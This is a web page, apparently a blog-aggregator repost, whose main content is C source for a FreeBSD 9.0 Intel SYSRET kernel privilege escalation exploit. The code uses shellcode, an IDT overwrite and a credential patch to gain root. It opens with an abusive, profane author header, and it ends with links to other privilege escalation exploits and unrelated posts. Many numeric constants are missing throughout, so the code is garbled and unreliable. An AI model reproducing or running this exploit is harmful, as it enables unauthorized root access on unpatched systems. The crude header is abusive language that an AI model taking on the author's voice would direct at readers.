/*

 * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit

 * Author by CurcolHekerLink

 *

 * This exploit based on open source project, I can make it open source too. Right?

 *

 * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)

 *

 * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,

 * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam

 * if you would like next private exploit leakage, just mention @MamahhDedeh

 *

 * Some people may feel harmed when we release this exploit :))

 *

 * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))

 *

 */

#include <stdio.h>

#include <stdlib.h>

#include <stdint.h>

#include <unistd.h>

#include <string.h>

#include <sys/mman.h>

#include <machine/cpufunc.h>

#define _WANT_UCRED

#include <sys/proc.h>

#include <machine/segments.h>

#include <sys/param.h>

#include <sys/linker.h>

#define TRIGGERSIZE 20

#define BOUNCESIZE 18

uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;

struct gate_descriptor * sidt()

{

        struct region_descriptor idt;

        asm ("sidt %0": "=m"(idt));

        return (struct gate_descriptor*)idt.rd_base;

}

u_long matchsym(char *symname)

{

        struct kld_sym_lookup ksym;

        ksym.version = sizeof (ksym);

        ksym.symname = symname;

        if (kldsym(, KLDSYM_LOOKUP, &ksym) < ) {

                perror("kldsym");

                exit();

        }

        return ksym.symvalue;

}

void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)

{

        struct gate_descriptor *ip;

        ip = idt + idx;

        ip->gd_looffset = func;

        ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);

        ip->gd_ist = ist;

        ip->gd_xx = ;

        ip->gd_type = typ;

        ip->gd_dpl = dpl;

        ip->gd_p = ;

        ip->gd_hioffset = func>>;

}

void payload()

{

        printf("[+] Woohoo!!!\n");

        exit();

}

void resetidt()

{

        struct thread *td;

        struct ucred *cred;

        struct gate_descriptor *idt = sidt();

        setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, );

        setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, );

        asm ("mov %%gs:0, %0" : "=r"(td));

        cred = td->td_proc->p_ucred;

        cred->cr_uid = cred->cr_ruid = cred->cr_rgid = ;

        cred->cr_groups[] = ;

        asm ("swapgs; sysretq;" :: "c"(payload));

}

void resolving()

{

        Xdivp = (uintptr_t)matchsym("Xdiv");

        Xdbgp = (uintptr_t)matchsym("Xdbg");

        Xbptp = (uintptr_t)matchsym("Xbpt");

        Xoflp = (uintptr_t)matchsym("Xofl");

        Xbndp = (uintptr_t)matchsym("Xbnd");

        Xillp = (uintptr_t)matchsym("Xill");

        Xdnap = (uintptr_t)matchsym("Xdna");

        Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");

        Xtssp = (uintptr_t)matchsym("Xtss");

        Xmissingp = (uintptr_t)matchsym("Xmissing");

        Xstkp = (uintptr_t)matchsym("Xstk");

        Xprotp = (uintptr_t)matchsym("Xprot");

        Xpagep = (uintptr_t)matchsym("Xpage");

        Xfpup = (uintptr_t)matchsym("Xfpu");

        Xalignp = (uintptr_t)matchsym("Xalign");

        Xmchkp = (uintptr_t)matchsym("Xmchk");

        Xxmmp = (uintptr_t)matchsym("Xxmm");

}

void trigger()

{

        printf("[+] Crotz...\n");

        uint64_t pagesize = getpagesize();

        uint8_t * mappedarea = (uint8_t*)((1ULL << ) - pagesize);

        mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -, );

        if (mappedarea == MAP_FAILED) {

                perror("mmap (trigger)");

                exit();

        }

        char triggerpayload[] =

                "\xb8\x18\x00\x00\x00"

                "\x48\x89\xe3"

                "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"

                "\x0f\x05";

        uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;

        memcpy(offset_addr, triggerpayload, TRIGGERSIZE);

        *(uint64_t*)(offset_addr + ) = (uint64_t)(((uint8_t*)&sidt()[]) +  * );

        printf("[+] Crotz...\n");

        char bouncepayload[] =

                "\x0f\x01\xf8"

                "\x48\x89\xdc"

                "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"

                "\xff\xe0";

        uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));

        size_t bouncer_allocsize = pagesize;

        if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-)) + pagesize < bouncer + BOUNCESIZE)

                bouncer_allocsize += pagesize;

        if (mmap((void*)((uint64_t)bouncer & ~(pagesize-)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -, ) == MAP_FAILED)

        {

                perror("mmap (bouncer)");

                exit();

        }

        memcpy(bouncer, bouncepayload, BOUNCESIZE);

        *(uint64_t*)(bouncer + ) = (uint64_t)resetidt;

        ((void (*)())offset_addr)();

}

int main(int argc, char *argv[])

{

        printf("[+] SYSRET FUCKUP!!\n");

        printf("[+] Start Engine...\n");

        resolving();

        printf("[+] Crotz...\n");

        trigger();

        return ;

}

FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit的更多相关文章

  1. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  2. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  3. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  4. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  5. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  6. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  7. [EXP]Memu Play 6.0.7 - Privilege Escalation

    # Exploit Title: Memu Play - Privilege Escalation (PoC) # Date: // # Author: Alejandra Sánchez # Ven ...

  8. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  9. Linux 2.6.x fs/pipe.c local kernel root(kit?) exploit (x86)

    /****************************************************************************** * .:: Impel Down ::. ...

随机推荐

  1. 用几条shell命令快速去重10G数据

    试想一下,如果有10G数据,或者更多:怎么才能够快速地去重呢?你会说将数据导入到数据库(mysql等)进行去重,或者用java写个程序进行去重,或者用Hadoop进行处理.如果是大量的数据要写入数据库 ...

  2. hdu 1233 还是畅通工程 解题报告

    题目链接:http://code.hdu.edu.cn/showproblem.php?pid=1233 并查集的运用, 实质就是求最小生成树.先对所有的村庄距离从小到大排序,然后判断村庄之间是否属于 ...

  3. POJ1704 Georgia and Bob (阶梯博弈)

    Georgia and Bob Time Limit: 1000MS   Memory Limit: 10000KB   64bit IO Format: %I64d & %I64u Subm ...

  4. Java Hour 53 HQL

    上回写到一个一个最基本的HQL 查询语句写出来都没有什么自信,这一课时就补上HQL 相关的知识. 这种东西笔者最喜欢的官方的原版说明文档了. http://docs.jboss.org/hiberna ...

  5. poj 3264 RMQ 水题

    题意:找到一段数字里最大值和最小值的差 水题 #include<cstdio> #include<iostream> #include<algorithm> #in ...

  6. dip,px,pt,sp的区别

    dip: device independent pixels(设备独立像素). 不同设备有不同的显示效果,这个和设备硬件有关,一般我们为了支持WVGA.HVGA和QVGA 推荐使用这个,不依赖像素. ...

  7. OD使用心得

    查看堆栈 从返回前面的竖线 到 竖线结束 也就是到 (从返回 msconfig.0065a318) 全看.这样不会丢失些东西 或者 看堆栈  直接将堆栈框拉大 避免有些东西没有看到

  8. 常用的 Python 爬虫技巧总结

    用python也差不多一年多了,python应用最多的场景还是web快速开发.爬虫.自动化运维:写过简单网站.写过自动发帖脚本.写过收发邮件脚本.写过简单验证码识别脚本. 爬虫在开发过程中也有很多复用 ...

  9. 无法获得锁 /var/lib/dpkg/lock - open (11: 资源临时不可用)

    转自:http://www.cnblogs.com/ManMonth/archive/2010/01/14/1648010.html 问题: 运行程序更新时出现报错: 无法获得锁 /var/lib/d ...

  10. 异步加载图片Universal-Image-Loader

    项目地址:https://github.com/nostra13/Android-Universal-Image-Loader